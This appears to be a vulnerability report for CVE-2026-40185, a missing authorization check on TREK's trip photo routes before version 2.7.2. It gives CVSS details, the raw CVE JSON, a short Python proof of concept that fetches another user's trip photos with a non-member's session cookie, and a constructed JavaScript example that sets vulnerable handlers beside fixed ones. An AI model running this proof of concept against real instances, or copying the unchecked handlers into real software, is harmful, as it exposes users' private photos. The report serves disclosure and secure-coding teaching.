Security Vulnerability Report

CVE-2026-40185

Published: 2026-04-10 20:16:24
Last Modified: 2026-04-21 19:22:44

Description

TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. This vulnerability is fixed in 2.7.2.

Weakness: CWE-862 (Missing Authorization). The routes authenticate the caller but do not verify that the caller is allowed to act on the trip whose photos are being managed.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Two CVSS v3.1 assessments are recorded for this CVE (see the raw JSON below). The 7.1 HIGH score above is the Secondary metric. The Primary metric rates integrity impact as None instead of Low, giving CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N and a base score of 6.5 MEDIUM. Both agree that an authenticated low-privilege user (PR:L) can reach other users' trip photo data over the network without any user interaction; they differ only on whether the photo management routes also let that user alter it.

Configurations (Affected Products)

cpe:2.3:a:mauriceboe:trek:*:*:*:*:*:node.js:*:* - VULNERABLE
TREK < 2.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-40185: TREK Immich Photo Management Authorization Bypass
Description: Exploits missing authorization checks to access/manipulate trip photos.
"""
import requests

# Target, trip id and cookie are placeholders: point base_url at a TREK instance
# and supply the session cookie of a user who is NOT the owner or a member of trip_id.
base_url = "http://localhost:3000"
trip_id = 1
target_url = f"{base_url}/api/trips/{trip_id}/photos"
attacker_cookie = "session=low_priv_user_session_token"

# Attacker tries to access photos of a trip they do not own
headers = {
    "Cookie": attacker_cookie,
    "User-Agent": "CVE-2026-40185-Scanner",
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    # A 200 only demonstrates the bypass if the cookie really belongs to a
    # non-member of trip_id; a patched instance should reject the request.
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: Unauthorized access to photo data successful!")
        print(f"[+] Data leaked: {response.text[:200]}...")
    else:
        print(f"[-] Target may not be vulnerable or patched (HTTP {response.status_code}).")
except requests.RequestException as e:
    print(f"Error: {e}")
```
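The missing-check pattern the advisory describes, shown as a vulnerable per-trip photo handler beside a fixed one. This is an added example, not code from TREK or from its fix commit: the in-memory data model, the session lookup, the handler names, the photo-removal route and the choice to answer 404 for "not yours" are all assumptions made for the illustration, and the `/api/trips/{trip_id}/photos` route shape follows the PoC above rather than TREK's actual routes. The sample users and trip are constructed.

```javascript
// Constructed sample state: three users with sessions, one trip owned by alice
// that carol has been invited to. bob is authenticated but NOT a member.
const SESSIONS = { 'sess-alice': 'alice', 'sess-bob': 'bob', 'sess-carol': 'carol' };
const TRIPS = {
  42: { owner: 'alice', members: ['carol'], photos: ['immich-asset-1', 'immich-asset-2'] },
};

// Authentication: map the session cookie to a user. This answers "who is this?",
// not "may they touch trip 42?".
function authenticate(req) {
  const m = /(?:^|;\s*)session=([^;]+)/.exec(req.headers.cookie || '');
  return (m && SESSIONS[m[1]]) || null;
}

// Authorization: only the owner or an invited member may manage a trip's photos.
function canManageTripPhotos(user, trip) {
  return trip.owner === user || trip.members.includes(user);
}

// Vulnerable shape (CWE-862): any authenticated user who knows or guesses a
// trip id reaches that trip's photo data.
function listPhotosVulnerable(req) {
  const user = authenticate(req);
  if (!user) return { status: 401, body: { error: 'not authenticated' } };
  const trip = TRIPS[req.params.tripId];
  if (!trip) return { status: 404, body: { error: 'no such trip' } };
  // Missing here: no check that `user` is allowed to see `trip`.
  return { status: 200, body: { photos: [...trip.photos] } };
}

// Same flaw on a mutating route: this is where an integrity impact comes from.
function removePhotoVulnerable(req) {
  const user = authenticate(req);
  if (!user) return { status: 401, body: { error: 'not authenticated' } };
  const trip = TRIPS[req.params.tripId];
  if (!trip) return { status: 404, body: { error: 'no such trip' } };
  trip.photos = trip.photos.filter((p) => p !== req.params.photoId);
  return { status: 200, body: { photos: [...trip.photos] } };
}

// Fixed shape: one helper resolves user and trip and applies the ownership
// check, so every photo route passes the same gate before touching data.
function authorizeTrip(req) {
  const user = authenticate(req);
  if (!user) return { error: { status: 401, body: { error: 'not authenticated' } } };
  const trip = TRIPS[req.params.tripId];
  // Same 404 for "does not exist" and "not yours", so the route cannot be used
  // to enumerate valid trip ids (a design choice of this example).
  if (!trip || !canManageTripPhotos(user, trip)) {
    return { error: { status: 404, body: { error: 'no such trip' } } };
  }
  return { user, trip };
}

function listPhotosFixed(req) {
  const auth = authorizeTrip(req);
  if (auth.error) return auth.error;
  return { status: 200, body: { photos: [...auth.trip.photos] } };
}

function removePhotoFixed(req) {
  const auth = authorizeTrip(req);
  if (auth.error) return auth.error;
  auth.trip.photos = auth.trip.photos.filter((p) => p !== req.params.photoId);
  return { status: 200, body: { photos: [...auth.trip.photos] } };
}

// Build a request of the kind the PoC sends: a session cookie of a user who is
// not a member of the target trip, against /api/trips/<tripId>/photos.
function requestAs(sessionId, tripId, photoId) {
  return {
    headers: { cookie: `session=${sessionId}` },
    params: { tripId: String(tripId), photoId },
  };
}

console.log('vulnerable, bob :', listPhotosVulnerable(requestAs('sess-bob', 42)).status);   // 200
console.log('fixed, bob      :', listPhotosFixed(requestAs('sess-bob', 42)).status);        // 404
console.log('fixed, alice    :', listPhotosFixed(requestAs('sess-alice', 42)).status);      // 200
```

The point to check in any review of a fix like TREK's is that the authorization helper is applied on every route of the resource, including the mutating ones; a fix that guards only the listing route closes the confidentiality impact but leaves the integrity impact that the Secondary CVSS vector records.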

References

https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179 (Patch)
https://github.com/mauriceboe/TREK/releases/tag/v2.7.2 (Release Notes)
https://github.com/mauriceboe/TREK/security/advisories/GHSA-pcr3-6647-jh72 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40185",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T20:16:23.573",
    "lastModified": "2026-04-21T19:22:43.510",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. This vulnerability is fixed in 2.7.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mauriceboe:trek:*:*:*:*:*:node.js:*:*",
                "versionEndIncluding": "2.7.1",
                "matchCriteriaId": "FF5D262A-7F86-423E-9001-27183BE3840F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mauriceboe/TREK/releases/tag/v2.7.2",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/mauriceboe/TREK/security/advisories/GHSA-pcr3-6647-jh72",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```